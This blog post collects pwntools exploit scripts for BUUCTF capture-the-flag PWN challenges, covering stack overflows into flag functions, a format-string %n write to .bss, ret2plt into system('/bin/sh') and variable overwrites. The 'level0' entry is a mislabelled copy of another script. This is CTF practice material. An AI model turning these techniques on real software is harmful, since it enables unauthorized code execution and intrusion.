PWN

BUUCTF PWN exploit scripts (pwntools)

Posted by Leo on 2023-11-29

test_your_nc

#!/usr/bin/env python
"""test_your_nc: the service already drops into a shell, so no payload is needed.

Spawn the binary (the commented-out ``remote`` line is the BUUCTF endpoint)
and hand the terminal straight to the user.
"""
from pwn import *

context.arch = 'amd64'

# Local run against the downloaded binary; swap in the remote() call to hit
# the challenge node instead.
sh = process('./test')
# sh = remote('node4.buuoj.cn', 25291)
sh.interactive()

rip

#!/usr/bin/env python
"""rip: classic stack overflow via gets() -- overwrite the return address with
the backdoor function's address.
"""
from pwn import *

context.arch = 'amd64'

# NOTE(review): the commented-out remote port is the same one test_your_nc
# uses and is probably stale; check the current instance before using it.
# sh = remote('node4.buuoj.cn', 25291)
sh = process('./pwn1')

# Where the overwritten return address points. Presumably a few bytes into
# the backdoor function, i.e. past its `push rbp`: skipping the prologue is
# the usual workaround for the 16-byte stack-alignment requirement that makes
# system() fault on movaps when entered misaligned -- confirm in the
# disassembly.
ret_addr = 0x000000000040118A

# 23 bytes of filler: the original 0x10+8-1 arithmetic implies a 0xF-byte
# buffer directly below the saved rbp (8 bytes) -- confirm the stack layout.
filler = b'a' * 23
payload = flat(filler, ret_addr)
# sendline's trailing newline is what terminates gets().
sh.sendline(payload)
sh.interactive()

warmup_csaw_2016

#!/usr/bin/env python
"""warmup_csaw_2016: stack overflow, return into the flag-printing function."""
from pwn import *

context.arch = 'amd64'

# NOTE(review): the commented-out remote port duplicates test_your_nc's and
# is probably stale; check the current instance before using it.
# sh = remote('node4.buuoj.cn', 25291)
sh = process('./warmup_csaw_2016')

# Target of the hijacked return -- presumably the function that prints the
# flag (or a few bytes into it, past the prologue); confirm in the
# disassembly.
ret_addr = 0x0000000000400611

# 0x40 bytes fill the input buffer and 8 more cover the saved rbp, so the
# packed address lands on the return slot. Assumes the buffer sits at
# rbp-0x40 -- TODO confirm.
overflow_len = 0x40 + 8
payload = b''.join([b'a' * overflow_len, p64(ret_addr)])
sh.sendline(payload)
sh.interactive()

ciscn_2019_n_1

#!/usr/bin/env python
"""ciscn_2019_n_1: overflow a buffer so that a neighbouring float variable
takes a specific value.
"""
from pwn import *

# Remote is the live target; the local process line is kept for debugging.
sh = remote('node4.buuoj.cn', 26378)
# sh = process('./ciscn_2019_n_1')
context.arch = 'amd64'
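import struct


def float_to_hex_bytes(f: float) -> str:
    """Return the IEEE-754 single-precision encoding of *f* as a hex string.

    The value is packed explicitly little-endian (``'<f'``) so the output
    matches what the x86-64 target holds in memory regardless of the host
    running the script; the previous ``'f'`` format used the host's native
    byte order and alignment.

    Args:
        f: value to encode; it is rounded to float32 precision.

    Returns:
        Lower-case hex of the 4 little-endian bytes, e.g. ``'00803441'`` for
        ``11.28125`` (bit pattern ``0x41348000``).

    Raises:
        OverflowError: if *f* does not fit in a float32.
    """
    return struct.pack('<f', f).hex()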
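# The binary compares a float against 11.28125; overwrite it with that
# value's exact float32 bit pattern (0x41348000). The pattern is derived from
# the float here instead of being hard-coded next to a discarded helper call,
# so the two can never drift apart.
target = 11.28125
ans = struct.unpack('<I', struct.pack('<f', target))[0]
# 0x2c bytes of filler reach the float from the start of the input buffer --
# NOTE(review): assumes the buffer is at rbp-0x30 and the float at rbp-0x4;
# confirm in the disassembly. p64 keeps the original 8-byte write: the upper
# dword is zero and spills onto whatever follows the float on the stack.
payload = b'a' * 0x2c + p64(ans)
sh.sendline(payload)
sh.interactive()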

pwn1_sctf_2016

#!/usr/bin/env python
"""pwn1_sctf_2016: overflow through an input-expanding copy, return into the
flag function.
"""
from pwn import *

sh = remote('node4.buuoj.cn', 29648)
# sh = process('./pwn1_sctf_2016')

# Where execution resumes once the saved return address is replaced --
# presumably the binary's flag-dumping function; confirm in the disassembly.
ret_addr = 0x08048F13

# The filler is 'I' rather than 'a' on purpose: the 20*'I' + 4*'a' shape
# suggests the target rewrites each 'I' into a 3-byte string so that 20 of
# them occupy 60 bytes of buffer (NOTE(review): inferred from the payload,
# the expansion itself is not visible here). The 4 'a's then cover the saved
# ebp and the packed address overwrites the return slot.
filler = b'I' * 20
saved_ebp = b'a' * 4
payload = b''.join([filler, saved_ebp, p32(ret_addr)])
sh.sendline(payload)
sh.interactive()

level0 (note: the listing below is a copy of the pwn1_sctf_2016 exploit run locally; the level0 script itself is not shown)

#!/usr/bin/env python
"""Local run of the pwn1_sctf_2016 exploit.

NOTE(review): despite the "level0" heading this listing targets
./pwn1_sctf_2016 with the same payload and address as the previous section;
it does not exploit level0.
"""
from pwn import *

# sh = remote('node4.buuoj.cn', 29648)
sh = process('./pwn1_sctf_2016')

# Return target -- presumably the flag-printing function; confirm in the
# disassembly.
ret_addr = 0x08048F13

# 20 'I' bytes of filler (presumably expanded by the target to fill a
# 60-byte buffer), 4 bytes over the saved ebp, then the new return address.
parts = [b'I' * 20, b'a' * 4, p32(ret_addr)]
payload = b''.join(parts)
sh.sendline(payload)
sh.interactive()

[第五空间2019 决赛]PWN5

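#!/usr/bin/env python
"""[第五空间2019 决赛]PWN5: format-string write to the .bss value the password
is checked against, then log in with the value we wrote.
"""
from pwn import *

sh = remote('node4.buuoj.cn', 27050)
context.arch = 'i386'

# Address (in .bss) of the integer the submitted password is compared with.
bssaddr = 0x804C044

# "MMM" prints 3 bytes, then %12$n stores that running count (3) through the
# pointer found at positional argument 12 -- the p32 address appended right
# after the 8-byte format prefix. NOTE(review): argument 12 is the offset-10
# slot the earlier variants used plus the two dwords of prefix; confirm with
# a %p probe if the binary is rebuilt.
# Alternative, one byte-wide write per %n:
#   p32(bssaddr) + p32(bssaddr+1) + p32(bssaddr+2) + p32(bssaddr+3)
#   + b'%10$n%11$n%12$n%13$n'
payload = b'MMM%12$n' + p32(bssaddr)
print(payload)
# Tube I/O takes bytes; passing str makes pwntools guess an encoding and
# raise a BytesWarning, so the prompts and the answer are given as bytes.
sh.recvuntil(b'name:')
sh.sendline(payload)
sh.recvuntil(b'passwd')
# The comparison value is now 3, so the password is literally "3".
sh.sendline(b'3')
sh.interactive()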

jarvisoj_level2

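#!/usr/bin/env python
"""jarvisoj_level2: ret2plt -- overflow into system@plt with a "/bin/sh"
pointer as its argument.
"""
from pwn import *

sh = remote('node4.buuoj.cn', 29765)
context.arch = 'i386'
elf = ELF('./level2')

# Resolve both addresses from the binary that is already loaded instead of
# hard-coding them (the previous literals were system@plt = 0x08048320 and
# "/bin/sh" at 0x0804A024), so the script stays correct if the file changes.
system_addr = elf.plt['system']
sh_addr = next(elf.search(b'/bin/sh\x00'))

# 0x88 bytes fill the buffer and 4 more cover the saved ebp (assumes the
# buffer sits at ebp-0x88 -- confirm in the disassembly). The return slot
# then holds system@plt; the next 4 bytes are system's own (junk) return
# address, and the dword after that is its first argument, the "/bin/sh"
# pointer.
payload = b'a' * (0x88 + 4) + p32(system_addr) + b'aaaa' + p32(sh_addr)

sh.sendline(payload)
sh.interactive()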

ciscn_2019_n_8

#!/usr/bin/env python
"""ciscn_2019_n_8: overwrite an array so that the element at index 13 holds
17 (as a 64-bit compare) to pass the check.
"""
from pwn import *

# p = remote("node3.buuoj.cn",29772)
p = process('./ciscn_2019_n_8')

# Fill dwords 0..13 with 17 and zero dword 14: the trailing p32(0) suggests
# the binary compares the QWORD at var[13], whose upper half must be 0 --
# NOTE(review): inferred from the payload shape, confirm in the disassembly.
# The embedded NUL bytes survive because the input is presumably read with a
# %s-style scanf, which only stops on whitespace.
WANTED = 17
slots = [WANTED] * 14 + [0]
payload = b''.join(p32(v) for v in slots)
p.sendline(payload)
p.interactive()

本着互联网开源的性质,欢迎分享这篇文章,以帮助到更多的人,谢谢!